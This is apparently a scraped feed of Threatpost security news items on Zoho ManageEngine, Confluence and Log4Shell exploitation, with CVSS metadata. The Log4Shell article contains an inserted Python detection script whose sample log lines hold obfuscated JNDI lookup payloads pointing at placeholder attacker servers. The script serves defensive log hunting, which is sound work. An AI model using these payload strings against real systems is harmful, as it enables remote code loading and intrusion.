Subsequently in that case they were looking for weaknesses in US classified personnel \u2013 which would include health hardships \u2013 either personally or related to them,\u201d Klein told Threatpost via email on Monday.\n\nHe noted that following the OPM breach, some healthcare agencies were breached, including [Anthem Health](<https://threatpost.com/chinese-hackers-anthem-data-breach-indicted/144572/>): an attack that affected more than 78 million people. \u201cThe interest in healthcare data globally continues not only for espionage purposes against targets \u2013 building an inventory of hardships/weak points as well as seeking out healthcare data to better serve their local industries,\u201d Klein noted. \u201cOn energy, the interest is both on stealing industrial espionage information as well as to set up compromises in critical infrastructures for potential use in cases of future hostilities.\u201d\n\n## If Patching Isn\u2019t Mandatory, a Breach Is a Given\n\nMike Denapoli, lead security architect at Cymulate, added that well-documented (and patched) vulnerabilities in massively popular platforms like Microsoft Exchange and ManageEngine are ripe fruit for threat actors to pluck. Organizations that can\u2019t or won\u2019t patch are sitting ducks, he said.\n\n\u201cFor whatever the reasons may be (downtime avoidance, fear over patches disrupting workflows, etc.), attackers know these systems are vulnerable, and are making sure to take advantage of any organization that doesn\u2019t keep patching updated,\u201d Denapoli told Threatpost. \u201cWe have reached the point where patching is a must \u2013 within a reasonable amount of time \u2013 and needs to be performed. While you don\u2019t have to patch immediately, you must patch regularly. Downtime is mandatory. Testing is mandatory. 
If not, then a breach is mandatory.\u201d\n\n_Image courtesy of [AlphaCoders](<https://wall.alphacoders.com/big.php?i=1012166>)._\n\n110821 12:24 UPDATE: Added input from Mike Denapoli and Dave Klein.\n\n**_Cybersecurity for multi-cloud environments is notoriously challenging. OSquery and CloudQuery is a solid answer. Join Uptycs and Threatpost on Tues., Nov. 16 at 2 p.m. ET for \u201c_**[**_An Intro to OSquery and CloudQuery_**](<https://bit.ly/3wf2vTP>)**_,\u201d a LIVE, interactive conversation with Eric Kaiser, Uptycs\u2019 senior security engineer, about how this open-source tool can help tame security across your organization\u2019s entire campus._**\n\n[**_Register NOW_**](<https://bit.ly/3wf2vTP>)**_ for the LIVE event and submit questions ahead of time to Threatpost\u2019s Becky Bracken at _**[**_becky.bracken@threatpost.com_**](<mailto:becky.bracken@threatpost.com>)**_._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-08T16:38:05", "type": "threatpost", "title": "Zoho Password Manager Flaw Torched by Godzilla Webshell, New Data Stealer", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, 
"cvelist": ["CVE-2021-35211", "CVE-2021-40539"], "modified": "2021-11-08T16:38:05", "id": "THREATPOST:BC99709891AA93FC7767B53445FC2736", "href": "https://threatpost.com/zoho-password-manager-flaw-godzilla-webshell/176063/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-07T16:21:15", "description": "A just-patched, critical remote code-execution (RCE) vulnerability in the Atlassian Confluence server platform is suffering wide-scale exploitation, the Feds have warned \u2013 as evidenced by an attack on the popular Jenkins open-source automation engine.\n\nAtlassian Confluence is a collaboration platform where business teams can organize their work in one place: \u201cDynamic pages give your team a place to create, capture, and collaborate on any project or idea,\u201d according to [the website](<https://www.atlassian.com/software/confluence/guides/get-started/confluence-overview>). \u201cSpaces help your team structure, organize and share work, so every team member has visibility into institutional knowledge and access to the information they need to do their best work.\u201d\n\nIn other words, it can house a treasure trove of sensitive business information as well as supply-chain information that could be used for follow-on attacks on partners, suppliers and customers.\n\n## **Jenkins Hack \u2013 Just a Cryptomining Hit**\n\nFor its part, Jenkins identified a \u201csuccessful attack against our deprecated Confluence service,\u201d it said in [a statement](<https://www.jenkins.io/blog/2021/09/04/wiki-attacked/>) over the weekend. 
Thankfully, \u201cwe have no reason to believe that any Jenkins releases, plugins or source code have been affected,\u201d the team added.\n\nThe attackers were able to exploit the bug in question ([CVE-2021-26084](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26084>)) to install a Monero cryptominer in the container running the service, according to the statement \u2013 no cyberespionage in this case. The team took the server offline immediately and rotated all passwords, and there\u2019s no plan to bring Confluence back, it said.\n\n\u201cAn attacker would not be able to access much of our other infrastructure,\u201d the statement continued, adding that the server hasn\u2019t been used in daily operations since late 2019. \u201cConfluence did integrate with our integrated identity system which also powers Jira, Artifactory, and numerous other services.\u201d\n\nThe hack comes on the heels of an urgent pre-Labor Day warning from U.S. Cyber Command that the flaw is firmly in the sights of cybercriminals aiming at U.S. businesses, less than 10 days after it was disclosed on August 25:\n\n> Mass exploitation of Atlassian Confluence CVE-2021-26084 is ongoing and expected to accelerate. Please patch immediately if you haven\u2019t already\u2014 this cannot wait until after the weekend.\n> \n> \u2014 USCYBERCOM Cybersecurity Alert (@CNMF_CyberAlert) [September 3, 2021](<https://twitter.com/CNMF_CyberAlert/status/1433787671785185283?ref_src=twsrc%5Etfw>)\n\nIt\u2019s a finding that echoes researchers from Bad Packets, who said [via Twitter](<https://twitter.com/bad_packets/status/1433157632370511873>) that they began to see mass scanning and exploitation for CVE-2021-26084 around Sept. 
1.\n\nOn Tuesday, Japan-CERT [issued guidance](<https://www.jpcert.or.jp/english/at/2021/at210037.html>) that active exploits were being deployed in Japan as well.\n\n## **RCE with CVE-2021-26084**\n\nThe bug is an Object-Graph Navigation Language (OGNL) injection vulnerability that affects Confluence Server and Data Center (affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5). OGNL is an expression language for getting and setting properties of Java objects, which can be used to create or change executable code.\n\nIn some cases, an unauthenticated attacker could execute arbitrary code on a computer running a Confluence Server or Data Center instance \u2013 which earned the issue a critical 9.8 out of 10 rating on the CVSS vulnerability-rating scale.\n\n\u201cIf the vulnerability is exploited, threat actors could bypass authentication and run arbitrary code on unpatched systems,\u201d [explained](<https://unit42.paloaltonetworks.com/cve-2021-26084/>) researchers at Palo Alto Networks, who also confirmed the exploitation activity.\n\nKaspersky researchers explained that the vulnerability is only usable for unauthenticated RCE if the option \u201cAllow people to sign up to create their account\u201d is active.\n\n\u201cSeveral proof-of-concepts for exploiting it, including a version that permits RCE, are already available online,\u201d Kaspersky noted [in its writeup](<https://www.kaspersky.com/blog/confluence-server-cve-2021-26084/41635/>), issued Monday.\n\nAtlassian [has released updates](<https://www.atlassian.com/software/confluence/download-archives>) for versions 6.13.23, 7.4.11, 7.11.6, 7.12.5 and 7.13.0. 
The bug doesn\u2019t affect Confluence Cloud users.\n\n## **Atlassian\u2019s Summer of Security Woes**\n\nIn July, Atlassian patched a serious flaw in its Jira platform, which is a proprietary bug-tracking and agile project-management tool used for software development. It\u2019s often tied to the Confluence platform through single sign-on (SSO) capabilities ([PDF](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/06/23175805/Atlassian-ATO-CPR-blog-FINAL.pdf>)).\n\nThe issue, tracked as CVE-2020-36239, could enable remote, unauthenticated attackers to execute arbitrary code in some Jira Data Center products, thanks to a missing authentication check in Jira\u2019s implementation of Ehcache, which is an open-source, Java distributed cache for general-purpose caching.\n\n\u201cCVE-2020-36239 can be remotely exploited to achieve arbitrary code execution and will likely be of great interest to both cybercriminals and nation-state-associated actors,\u201d Chris Morgan, senior cyber-threat intelligence analyst at digital-risk provider Digital Shadows, [said at the time](<https://threatpost.com/atlassian-critical-jira-flaw/168053/>). He pointed to several recent supply-chain attacks, including attacks against software providers Accellion and Kaseya, that have leveraged vulnerabilities to gain initial access and to compromise software builds \u201cknown to be used by a diverse client base.\u201d\n\nEarlier, in June, researchers uncovered a chain of Atlassian bugs that [could be tied together](<https://threatpost.com/atlassian-bugs-could-have-led-to-1-click-takeover/167203/>) for one-click information disclosure from Jira accounts. Sensitive information could have been easily siphoned out of the platform, researchers at Check Point Research said: \u201cAnything related to managing a team or writing\u2026code that you can encounter bugs in.\u201d\n\n**It\u2019s time to evolve threat hunting into a pursuit of adversaries. 
", "cvss3": {}, "published": "2021-09-07T16:07:58", "type": "threatpost", "title": "Jenkins Hit as Atlassian Confluence Cyberattacks Widen", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-36239", "CVE-2021-26084"], "modified": "2021-09-07T16:07:58", "id": "THREATPOST:042D7C606FEB056B462B0BFB61E59917", "href": "https://threatpost.com/jenkins-atlassian-confluence-cyberattacks/169249/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-29T20:34:59", "description": "What researchers are calling a \u201chorde\u201d of miner bots and backdoors are using the [Log4Shell](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) bug to take over vulnerable VMware Horizon servers, with threat actors still actively waging some attacks.\n\nOn Tuesday, Sophos [reported](<https://news.sophos.com/en-us/2022/03/29/horde-of-miner-bots-and-backdoors-leveraged-log4j-to-attack-vmware-horizon-servers/>) that the remote code execution (RCE) Log4j vulnerability in the ubiquitous Java logging library is under active attack, \u201cparticularly 
among cryptocurrency mining bots.\u201d Besides cryptominers, attackers are also prying open Log4Shell to deliver backdoors that Sophos believes belong to [initial access brokers](<https://threatpost.com/zebra2104-initial-access-broker-malware-apts/176075/>) (IABs), which could lay the groundwork for later ransomware infections.\n\n## History of Log4Shell Nightmare-ware\n\nThe Log4j flaw (CVE-2021-44228) was discovered in December, vigorously attacked within hours of its discovery and subsequently dubbed Log4Shell. Sophos\u2019s findings about VMware Horizon servers being besieged by threat actors leveraging the bug are in keeping with what\u2019s been happening since then: In fact, cyberattacks [increased](<https://threatpost.com/cyber-spike-attacks-high-log4j/177481/>) 50 percent YoY in 2021, peaking in December, due to a frenzy of Log4j exploits.\n\nWith [millions](<https://threatpost.com/microsoft-rampant-log4j-exploits-testing/177358/>) of Log4j-targeted attacks clocking in per hour since the flaw\u2019s [discovery](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>), within just a few weeks there was a record-breaking peak of 925 cyberattacks per week per organization globally, as Check Point Research (CPR) [reported](<https://blog.checkpoint.com/2022/01/10/check-point-research-cyber-attacks-increased-50-year-over-year/>) in early January.\n\nLog4Shell has been a nightmare for organizations to hunt down and remediate, given that the flaw affected hundreds of software products, \u201cmaking it difficult for some organizations to assess their exposure,\u201d noted Sophos researchers Gabor Szappanos and Sean Gallagher in Tuesday\u2019s report. 
In other words, some outfits don\u2019t necessarily know if they\u2019re vulnerable.\n\n## Why Attackers Have Zeroed in on Horizon\n\nIn particular, those attacks have included ones targeting vulnerable [VMware Horizon](<https://www.vmware.com/security/advisories/VMSA-2021-0028.html>) servers: a platform that serves up virtual desktops and apps across the hybrid cloud. These servers have been important tools in organizations\u2019 arsenals over the past few years, given the pandemic-driven need for work-from-home tools, the researchers pointed out.\n\nAlthough VMware [released](<https://kb.vmware.com/s/article/87073>) patched versions of Horizon earlier this month \u2013 on March 8 \u2013 many organizations may not have been able to deploy the patched version or apply workarounds, if they even know that they\u2019re vulnerable to begin with.\n\n\u201cAttempts to compromise Horizon servers are among the more targeted exploits of Log4Shell vulnerabilities because of their nature,\u201d Sophos said.\n\nEven those organizations that have applied the patches or workarounds may already have been compromised in other ways, given the backdoors and reverse-shell activity Sophos has tracked, the researchers cautioned.\n\nIn late December and January, VMware\u2019s Horizon servers with Log4Shell vulnerabilities came under [Cobalt Strike](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) attack, as [flagged](<https://www.huntress.com/blog/cybersecurity-advisory-vmware-horizon-servers-actively-being-hit-with-cobalt-strike>) by researchers at Huntress. 
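Every one of these Horizon intrusions starts with a single Log4j lookup string arriving in a request, so the first exposure question for an organization that is unsure whether it was hit is whether such strings ever reached its Java-facing services. The following is an added example, not code from Sophos or from the article, that hunts for Log4Shell (CVE-2021-44228) lookups in web access logs: it URL-decodes each line, collapses the nested `${lower:...}` and `${::-x}` lookups attackers used to defeat a plain `jndi:` match, and reports the scheme and target of any JNDI reference it finds. The log lines are constructed samples, and the 198.51.100.0/24 addresses are documentation-range placeholders standing in for attacker infrastructure.

```python
"""Added example (not from Sophos or the article): hunt for Log4Shell
(CVE-2021-44228) lookup strings in access-log lines, after undoing the
URL-encoding and nested-lookup obfuscation that defeats a plain 'jndi:' grep."""
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Innermost lookup: a ${...} whose body holds no further '${' or '}'.
INNER = re.compile(r"\$\{([^${}]*)\}")
# Schemes a JNDI lookup will follow. The target stops at whitespace, quotes or '}'.
JNDI = re.compile(r"""jndi:(ldaps?|rmi|dns|iiop|corba|nds|https?)://([^\s"'}]+)""", re.I)


def _resolve(body: str) -> str:
    """Evaluate one innermost lookup body the way attackers rely on Log4j doing it.
    Anything not covered stays as literal text, which is safe for detection
    because the surrounding characters are preserved."""
    if ":-" in body:                    # ${key:-default}: key never resolves, default wins
        return body.split(":-", 1)[1]   # covers ${::-j}, ${env:NOPE:-j}, ${sys:x:-j}
    head, sep, rest = body.partition(":")
    if sep and head.lower() == "lower":
        return rest.lower()
    if sep and head.lower() == "upper":
        return rest.upper()
    return body


def normalise(text: str, max_rounds: int = 20) -> str:
    """URL-decode twice (double-encoded payloads are common), then collapse nested
    lookups from the inside out. The round cap bounds the work on hostile input."""
    text = unquote(unquote(text))
    for _ in range(max_rounds):
        collapsed = INNER.sub(lambda m: _resolve(m.group(1)), text)
        if collapsed == text:
            break
        text = collapsed
    return text


def find_jndi(line: str) -> Optional[Tuple[str, str]]:
    """(scheme, target) of a JNDI reference hidden in the line, or None."""
    m = JNDI.search(normalise(line))
    return (m.group(1).lower(), m.group(2)) if m else None


def scan(lines: List[str]) -> List[Tuple[int, Tuple[str, str]]]:
    """1-based line numbers of hits, with what each lookup pointed at."""
    hits = []
    for number, line in enumerate(lines, start=1):
        hit = find_jndi(line)
        if hit:
            hits.append((number, hit))
    return hits


# Constructed Tomcat-style access-log lines (not real telemetry).
SAMPLE_LOG = [
    '10.0.0.5 - - [19/Jan/2022:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [19/Jan/2022:10:01:03 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [19/Jan/2022:10:01:04 +0000] "GET /portal/?q=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F198.51.100.7%3A1389%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.9 - - [19/Jan/2022:10:01:05 +0000] "POST /broker/xml HTTP/1.1" 200 10 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://198.51.100.7:1099/c}"',
    '10.0.0.9 - - [19/Jan/2022:10:01:06 +0000] "GET /portal/?q=${env:JAVA_HOME} HTTP/1.1" 200 10 "-" "-"',
]

if __name__ == "__main__":
    for number, (scheme, target) in scan(SAMPLE_LOG):
        print(f"line {number}: jndi lookup via {scheme} -> {target}")
```

Two caveats when running this against real logs: the payload most often rides in a header such as User-Agent or X-Forwarded-For, which a default access-log format may not record, so pull from a proxy or WAF log that keeps full headers where the application log does not; and a hit only proves an attempt reached the server, so the next step is process and outbound-connection telemetry for that host at that timestamp, not the log alone.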
Other [attacks](<https://twitter.com/GossiTheDog/status/1484145056198053891>) included those that [installed web shells](<https://digital.nhs.uk/cyber-alerts/2022/cc-4002>).\n\nThose attacks used Log4j\u2019s JNDI lookup, pointed at an attacker-controlled Lightweight Directory Access Protocol (LDAP) server, to retrieve a malicious Java class file that modified existing, legitimate Java code, injecting a web shell into the VM Blast Secure Gateway service and thereby granting attackers remote access and code execution. Sophos has seen these attacks show up in customer telemetry since the beginning of January, the researchers said.\n\nThe attacks against Horizon servers grew throughout January. Beyond attempts to deploy cryptocurrency-mining malware, other attacks were potentially designed either to grant threat actors initial access or to infect targets with ransomware, Sophos said. Such attacks have continued into this month: the security firm shared a bar chart, shown below, that tracks the ebb and flow of the attacks into mid-March.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/29124520/attack-horizon-e1648572335942.jpg>)\n\nVMware Horizon server attacks since the beginning of January. 
Source: Sophos.\n\n\u201cThe largest wave of Log4J attacks aimed at Horizon that we have detected began January 19, and is still ongoing,\u201d the researchers said.\n\nBut this wave hasn\u2019t relied on the use of one of cybercrooks\u2019 favorite tools, Cobalt Strike: a commercial penetration-testing tool that can be used to deploy beacons on systems in order to simulate attacks and test network defenses.\n\nRather, \u201cthe cryptominer installer script is directly executed from the Apache Tomcat component of the Horizon server,\u201d Sophos said, with the most frequently used server in the campaigns being 80.71.158.96.\n\n## The Payloads\n\nSophos found a slew of miners being dumped on targeted Horizon servers, including z0Miner, the JavaX miner and at least two variants \u2013 the Jin and Mimu cryptocurrency miner bots \u2013 of the XMRig cryptominer. Speaking of which, Uptycs reported in January that cryptojackers had figured out how to [inject XMRig](<https://threatpost.com/cybercriminals-vmware-vsphere-cryptominers/177722/>) into VMware\u2019s vSphere services, undetected. For its part, back in September 2021, Trend Micro [found](<https://www.trendmicro.com/en_us/research/21/i/cryptominer-z0miner-uses-newly-discovered-vulnerability-cve-2021.html>) that z0Miner operators were exploiting the [Atlassian Confluence RCE](<https://threatpost.com/jenkins-atlassian-confluence-cyberattacks/169249/>) (CVE-2021-26084) for cryptojacking attacks.\n\nSophos also found several backdoors, including several legitimate testing tools. One was Sliver: a tool used by red teams and penetration testers to emulate adversarial tactics. Sliver showed up as a precursor to the Jin miner in all the cases where Sophos was able to investigate further, leading the researchers to suspect that it\u2019s actually the payload. 
Alternatively, the actor behind Sliver may be a ransomware gang, the researchers hypothesized, given that the same servers deploying Sliver also hosted files to deliver the Atera agent as a payload.\n\nAtera is another common, legitimate remote monitoring and management tool. However, the threat actors aren\u2019t attacking existing Atera installations, per se, the researchers said. Rather, \u201cthey install their own Atera agents in order to use the Atera cloud management infrastructure to deploy additional payloads in the future,\u201d they explained.\n\nSophos also found the legitimate Splashtop Streamer remote-access tool being downloaded and installed on infected systems, \u201cprobably as an automated task for the new clients.\u201d\n\nAs well, there were several PowerShell-based reverse shells in the payload mix that had been dropped by the Log4Shell exploits.\n\n## Two Types of Reverse Shells\n\nSophos found two types of reverse shell: one, a shorter script that opens a socket connection to a remote server and executes the received buffer, which is supposed to be a PowerShell command.\n\nThey also found a larger variant of a reverse shell: one that can reflectively load a Windows binary, with the loader carried as an encrypted, base64-encoded blob, as depicted below:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/29155214/Base64_encoded_blob-e1648583546965.jpg>)\n\nBase64 encoded blob. Source: Sophos.\n\nSophos telemetry showed that while z0Miner, JavaX and some other payloads were downloaded directly by the web shells that had been used for initial compromise, the Jin bots were tied to use of Sliver and used the same wallets as Mimo, \u201csuggesting these three malware were used by the same actor,\u201d Sophos said. Researchers believe that Jin is, in fact, \u201csimply a rebranded version of Mimo.\u201d\n\n## Loads of New Malware Loaders\n\nNew malware loaders are springing up like dandelions in the spring. 
Besides the ones covered by Sophos in Tuesday\u2019s report, security researchers at Symantec today also published a technical [report](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUeZY5vOK6hHL-2FZQIhe5-2B4JVOehUh4Rb8p3ey37Q9OVEIiWGDSjejxPvkb8ovY0h-2FaWB9dvcXCl3SBCFSEuV5tcRGFsPYlsbDvD-2BUBbuZrpjG-2F3o76yv-2FjW7fnR-2BbuAqcTKlC8Ql3vteVWIz1-2F4jQ39BlDgn8Ze7x-2FjjxdfusIUCoWeHw_q07lK5GAAVvAnbc-2Fr-2FBDhAPhoMvwzp-2Bdh4wgfTcF0AUhu01ZMXdKNJrsN0iCyDU7ehW0N22Ype9yCK1TM6XYzQ9CpkZyf7pccI4YxuRF0BJuYEbml5ScFK0-2F-2FZqd-2FdTf4msXI8najxJ51o4YJVhtdqJKuSTmaXDsB1uynL70vmZixJBnwPhKCug0sz-2BmD22NzQdTPN5KP9W-2FB8FFI76ksSSNzbmCCaVViVDpzZ8413vH2SK7hoc-2F9PgDFHE5nPDuAWqJnV7-2B1m3omM9hPkKC6f0TGhlnK7L2Rm0UV3m4RfnEylMOpa8zOk3ZpTlH4NHB441qOzaGmeusjrgk12h1-2FHBCuMABwcfwmdXp6d8OUxE-3D>) on a new malware loader tracked as Verblecon that\u2019s escaped detection due to the polymorphic nature of its code.\n\nVerblecon has likewise been seen in attacks that install cryptocurrency miners on compromised machines.\n\nSaryu Nayyar, CEO and founder of [Gurucul](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUemyDumHlbVHpjKINAYc3Jk-3DThvL_q07lK5GAAVvAnbc-2Fr-2FBDhAPhoMvwzp-2Bdh4wgfTcF0AUhu01ZMXdKNJrsN0iCyDU7ehW0N22Ype9yCK1TM6XYzQ9CpkZyf7pccI4YxuRF0BJuYEbml5ScFK0-2F-2FZqd-2FdTf4msXI8najxJ51o4YJVhtdqJKuSTmaXDsB1uynL70vmZixJBnwPhKCug0sz-2BmD22NzQdTPN5KP9W-2FB8FFI76ksRzfCH77Y1C4pRGOycTIJafHsN-2B4KnSygPf4489ZnosIN0CloPhQCESwF4k9NfwdKmZsgKHx6JGWXjEVL3UpRuh84NABjevUYJLlxFeyFD2KR14VLhnCySOfOl1QNCbp-2F2Vu3lWjuUOLb0td2Dh5r3I-3D>), told Threatpost that in order to fight the legitimate assessment tools being used to breach organizations, it\u2019s also \u201ccritical\u201d to employ sophisticated technologies \u2013 namely, self-training machine learning and behavioral models \u2013 to sniff out exploitation of exposed vulnerabilities as well as to detect the remote surveillance done by attackers with tools such as Cobalt Strike, et al.\n\n\u201cCurrent [extended 
detection and response, or XDR] and traditional [security information and event management, or SIEM] solutions, even with claims of User Entity Behavior Analytics rooted in known patterns and rule-based artificial intelligence, are unable to adapt to these methods,\u201d she told Threatpost via email. \u201cOrganizations need to invest in solutions that employ transparent non rule-based machine learning models to more rapidly identify new attacks.\u201d\n\nChris Olson, CEO of digital safety platform The Media Trust, told Threatpost on Tuesday that polymorphic techniques \u201care just another way to hide malicious intentions, along with checks for security tools and live environments.\u201d\n\nThis attack provides another example of how the risks of Web 2.0 are being replicated in Web 3.0, he said via email.\n\n\u201cToday\u2019s embryonic beginnings of Web 3.0 are eerily reminiscent of the Web as it existed in the 1990s, showing sporadic signs of vulnerability that may well foreshadow a future era of cyber chaos,\u201d Olson said.\n\nTo prevent that from happening, we must learn from our past mistakes, he warned. \u201cToday\u2019s digital ecosystem is riddled with threats because Web 2.0 was not designed for cybersecurity from the outset. Untrusted third parties were allowed to proliferate, leading to phishing attacks, malicious advertising, rampant data privacy abuse and other threats that are hard to fix in the present. With Web 3.0, we have a chance to account for potential attack vectors by design \u2013 otherwise, the same issues will replicate themselves with greater potency than ever.\u201d\n\n
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-29T20:33:08", "type": "threatpost", "title": "Log4JShell Used to Swarm VMware Servers with Miners, Backdoors", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-44228"], "modified": "2022-03-29T20:33:08", "id": "THREATPOST:4EEFA1A0FABB9A6E17C3E70F39EB58FE", "href": "https://threatpost.com/log4jshell-swarm-vmware-servers-miners-backdoors/179142/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-18T16:16:07", "description": "A critical security vulnerability in the Zoho ManageEngine Desktop Central and Desktop Central MSP platforms could allow authentication bypass, the 
company has warned.\n\nThe bug (CVE-2021-44757) could allow a remote user to \u201cperform unauthorized actions in the server,\u201d according to the company\u2019s Monday [security advisory](<https://pitstop.manageengine.com/portal/en/community/topic/a-critical-security-patch-released-in-desktop-central-and-desktop-central-msp-for-cve-2021-44757-17-1-2022>). \u201cIf exploited, this vulnerability may allow an attacker to read unauthorized data or write an arbitrary .ZIP file on the server.\u201d\n\nZoho\u2019s ManageEngine Desktop Central is a unified endpoint management (UEM) solution that lets IT admins manage servers, laptops, desktops, smartphones and tablets from a central location. Users can automate routines like installing patches, deploying software, and imaging and deploying operating systems, according to the company\u2019s [documentation](<https://www.manageengine.com/products/desktop-central/software-installation-supported-executables-how-to.html>). It can also be used to manage assets and software licenses, monitor software-usage statistics, manage USB device usage, take control of remote desktops, and more.\n\nOn the mobile side, users can deploy profiles and policies; configure devices for Wi-Fi, VPNs, email accounts and so on; apply restrictions on application installs, camera usage and the browser; and manage security with passcodes and remote lock/wipe functionality.\n\nAs such, the platform offers far-reaching access into the guts of an organization\u2019s IT footprint, which makes a successful exploit a potential information-disclosure nightmare. 
As well, the [ability to write a .ZIP file](<https://www.manageengine.com/products/desktop-central/software-installation-supported-executables-how-to.html>) to the server (a package format Desktop Central can push to endpoints as a software installation) paves the way for the installation of malware on all of the endpoints managed by the Desktop Central instance.\n\nIn the case of the MSP version \u2013 which, as its name suggests, allows managed service providers (MSPs) to offer endpoint management to their own customers \u2013 the bug could be used in a [supply-chain attack](<https://threatpost.com/kaseya-attack-fallout/167541/>). Cybercriminals could compromise one MSP\u2019s Desktop Central MSP edition and potentially gain access to the customers whose footprints are being managed using it, depending on the security measures the provider has put in place.\n\nZoho ManageEngine [released a Knowledge Base entry detailing patches](<https://www.manageengine.com/products/desktop-central/cve-2021-44757.html>) on Monday, and users are encouraged to update to the latest build in order to protect themselves. The firm also offered tips for general hardening of Desktop Central environments in the KB article.\n\n## **Zoho ManageEngine: Popular for Zero-Day Attacks**\n\nThe company didn\u2019t say whether the bug has been under attack as a zero-day vulnerability, but it\u2019s a good bet that cyberattackers will start targeting it for exploit if they haven\u2019t already. The ManageEngine platform is a popular one for attackers, given its all-seeing nature.\n\nThis played out in September, for instance, when a critical security vulnerability (CVE-2021-40539) in the Zoho ManageEngine ADSelfService Plus platform was patched; it could allow remote attackers to bypass authentication and have free rein across users\u2019 Active Directory (AD) and cloud accounts. 
But it was [under active attack](<https://threatpost.com/zoho-password-manager-zero-day-attack/169303/>) even before it was fixed, according to the Cybersecurity and Infrastructure Security Agency (CISA).\n\nIn December, the FBI even went so far as to issue [an official alert](<https://threatpost.com/zoho-zero-day-manageengine-active-attack/177178/>) after a Zoho ManageEngine zero-day vulnerability was found to be under active attack from an advanced persistent threat (APT) group. That bug (CVE-2021-44515) could allow remote attackers to override legitimate functions of servers running ManageEngine Desktop Central and to elevate privileges \u2013 with an ultimate goal of dropping malware onto organizations\u2019 networks.\n\n
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-01-18T15:44:21", "type": "threatpost", "title": "Critical ManageEngine Desktop Server Bug Opens Orgs to Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539", "CVE-2021-44515", "CVE-2021-44757"], "modified": "2022-01-18T15:44:21", "id": "THREATPOST:98AF08B524D08ABCEB115FECEE99B70F", "href": "https://threatpost.com/critical-manageengine-desktop-server-bug-malware/177705/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-21T14:43:15", "description": "Another Zoho ManageEngine 